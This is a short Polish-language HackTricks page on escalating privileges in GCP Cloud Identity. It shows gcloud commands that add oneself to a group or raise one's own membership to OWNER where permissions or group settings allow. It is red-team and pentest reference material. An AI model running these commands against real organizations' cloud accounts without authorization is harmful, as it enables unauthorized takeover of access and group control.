GCP - Cloudidentity Privesc

Dowiedz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Dowiedz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wesprzyj HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Dziel się trikami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud na githubie.

Cloudidentity

Aby uzyskać więcej informacji na temat usługi cloudidentity, sprawdź tę stronę:

GCP - IAM, Principals & Org Policies Enum

Dodaj siebie do grupy

Jeśli twoje konto ma wystarczające uprawnienia lub grupa jest źle skonfigurowana, możesz dodać siebie jako członka nowej grupy:

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Modyfikowanie przynależności do grupy

Jeśli użytkownik ma wystarczające uprawnienia lub grupa jest źle skonfigurowana, może on uczynić siebie WŁAŚCICIELEM grupy, do której należy:

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER

Ucz się i praktykuj Hacking AWS: HackTricks Training AWS Red Team Expert (ARTE) Ucz się i praktykuj Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wesprzyj HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Udostępniaj sztuczki hackingowe, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

PreviousGCP - Cloudfunctions Privesc NextGCP - Cloud Scheduler Privesc

Last updated 1 month ago